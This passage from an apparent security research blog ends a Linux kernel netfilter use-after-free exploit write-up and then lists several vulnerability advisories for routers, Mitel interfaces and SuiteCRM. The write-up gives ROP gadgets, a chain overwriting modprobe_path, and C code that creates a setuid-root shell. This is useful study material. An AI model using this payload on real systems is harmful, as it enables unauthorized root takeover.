    2. Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the MODPROBE_PATH global variable, the stack is pivoted again to the end of the fake nft_set used for RIP control.
    3. Build a ROP chain to overwrite the MODPROBE_PATH global variable. Place it at the end of the nft_set mentioned in step 2.
    4. Return to userland by using the KPTI trampoline.
    5. Drop to a privileged shell by leveraging the overwritten MODPROBE_PATH global variable.

    The stack pivot gadgets and ROP chain used can be found below.

    // ROP gadget to pivot the stack to the nftables registers memory area
    0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;
    // ROP gadget to pivot the stack to the memory allocation holding the target nft_set
    0xffffffff810b08f1: pop rsp ; ret ;

    When the execution flow is redirected, the RSI register contains the address of the nftables registers memory area. This memory can be controlled and is therefore used as a temporary stack; since the area is not big enough to hold the entire ROP chain, the second gadget shown above is then used to pivot the stack towards the end of the fake nft_set object.

    // ROP chain used to overwrite the MODPROBE_PATH global variable
    
    0xffffffff8148606b: pop rax ; ret ;
    0xffffffff8120f2fc: pop rdx ; ret ;
    0xffffffff8132ab39: mov qword [rax], rdx ; ret ;

    It is important to mention that the stack pivoting gadget used performs memory dereferences, which requires the dereferenced address to be mapped. While experimentally that address was usually mapped, this dependency negatively impacts the reliability of the exploit.
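
    For completeness, the final userland step (step 5 above) can be sketched as follows. This is the commonly used modprobe_path technique; the payload path /tmp/x and the helper script are illustrative assumptions for this sketch, not necessarily the exploit's exact values.

#include <stdlib.h>
#include <sys/stat.h>

/* After the ROP chain has pointed modprobe_path at /tmp/x, executing a file
 * with an unknown binary format makes the kernel run /tmp/x as root. */
static void modprobe_path_shell(void)
{
    /* Payload executed by the kernel as root. */
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'cp /bin/sh /tmp/rootsh; chmod 4755 /tmp/rootsh' >> /tmp/x");
    chmod("/tmp/x", 0755);

    /* A file whose leading bytes match no binfmt handler. */
    system("printf '\\377\\377\\377\\377' > /tmp/trigger");
    chmod("/tmp/trigger", 0755);

    /* Executing it fails in userland, but on the way the kernel invokes the
     * (overwritten) modprobe_path helper with root privileges. */
    system("/tmp/trigger");

    /* Drop into the setuid-root shell created by the payload. */
    system("/tmp/rootsh -p");
}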

    Wrapping Up

    We hope you enjoyed this read and learned something new. If you are hungry for more, make sure to check out our other blog posts.

    We wish y’all great Christmas holidays and a happy New Year! Here’s to a 2023 with more bugs, exploits, and write-ups!

    The post Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg appeared first on Exodus Intelligence.

    TP-Link WR940N/WR941ND Uninitialized Pointer Vulnerability

    23 June 2022 at 18:56

    EIP-9ad27c94

    An uninitialized pointer vulnerability exists within TP-Link’s WR940N and WR941ND SOHO router devices, specifically during the processing of UPnP/SOAP SUBSCRIBE requests. Successful exploitation allows local unauthenticated attackers to execute arbitrary code under the context of the ‘root’ user.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-9ad27c94
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 8.3

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: June 23rd, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post TP-Link WR940N/WR941ND Uninitialized Pointer Vulnerability appeared first on Exodus Intelligence.

    TP-Link WA850RE Unauthenticated Configuration Disclosure Vulnerability

    23 June 2022 at 18:56

    EIP-9098806c

    A vulnerability exists within the httpd server of the TP-Link WA850RE Universal Wi-Fi Range Extender that allows remote unauthenticated attackers to download the configuration file. Retrieval of this file results in the exposure of admin credentials and other sensitive information.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-9098806c
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 8.3

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: June 23rd, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post TP-Link WA850RE Unauthenticated Configuration Disclosure Vulnerability appeared first on Exodus Intelligence.

    TP-Link WA850RE Remote Command Injection Vulnerability

    23 June 2022 at 18:56

    EIP-7758d2d4

    A vulnerability exists within the httpd server of the TP-Link WA850RE Universal Wi-Fi Range Extender that allows authenticated attackers to inject arbitrary commands as arguments to an execve() call due to a lack of input sanitization. Injected commands are executed with root privileges. This issue is further exacerbated when combined with the configuration leak from EIP-9098806c.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-7758d2d4
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 7.7

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: December 10th, 2021
    • Disclosed to public: June 23rd, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post TP-Link WA850RE Remote Command Injection Vulnerability appeared first on Exodus Intelligence.

    Mitel Web Management Interface Buffer Overflow Vulnerability

    9 June 2022 at 17:46

    EIP-c4542e4d

    A stack-based buffer overflow vulnerability exists within multiple Mitel product web management interfaces, including the 3300 Controller and MiVoice Business product lines. Improper handling of the ‘Lang’ query parameter allows remote unauthenticated attackers to execute arbitrary code.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-c4542e4d
    • MITRE CVE: TBD

    Vulnerability Metrics

    • CVSSv2 Score: 10.0

    Vendor References

    Discovery Credit

    • Austin Martinetti and Brett Bryant working through our Research Sponsorship Program (RSP).

    Disclosure Timeline

    • Disclosed to affected vendor: April 21st, 2022
    • Disclosed to public: June 9th, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program (RSP).

    The post Mitel Web Management Interface Buffer Overflow Vulnerability appeared first on Exodus Intelligence.

    SalesAgility SuiteCRM ‘export’ Request SQL Injection Vulnerability

    9 June 2022 at 17:21

    EIP-0f5d2d7f

    A SQL injection vulnerability exists within SalesAgility SuiteCRM within the processing of the ‘uid’ parameter within the ‘export’ functionality. Successful exploitation allows remote unauthenticated attackers to ultimately execute arbitrary code.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-0f5d2d7f
    • MITRE CVE: Pending

    Vulnerability Metrics

    • CVSSv2 Score: 9.7

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: March 2nd, 2022
    • Disclosed to public: June 9th, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program.

    The post SalesAgility SuiteCRM ‘export’ Request SQL Injection Vulnerability appeared first on Exodus Intelligence.

    SalesAgility SuiteCRM ‘deleteAttachment’ Type Confusion Vulnerability

    9 June 2022 at 17:21

    EIP-0077b802

    A type confusion vulnerability exists within SalesAgility SuiteCRM within the processing of the ‘module’ parameter within the ‘deleteAttachment’ functionality. Successful exploitation allows remote unauthenticated attackers to alter database objects including changing the email address of the administrator.

    Vulnerability Identifiers

    • Exodus Intelligence: EIP-0077b802
    • MITRE CVE: Pending

    Vulnerability Metrics

    • CVSSv2 Score: 9.7

    Vendor References

    Discovery Credit

    • Exodus Intelligence

    Disclosure Timeline

    • Disclosed to affected vendor: March 2nd, 2022
    • Disclosed to public: June 9th, 2022

    Further Information

    Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

    Researchers who are interested in monetizing their 0Day and NDay can work with us through our Research Sponsorship Program.

    The post SalesAgility SuiteCRM ‘deleteAttachment’ Type Confusion Vulnerability appeared first on Exodus Intelligence.
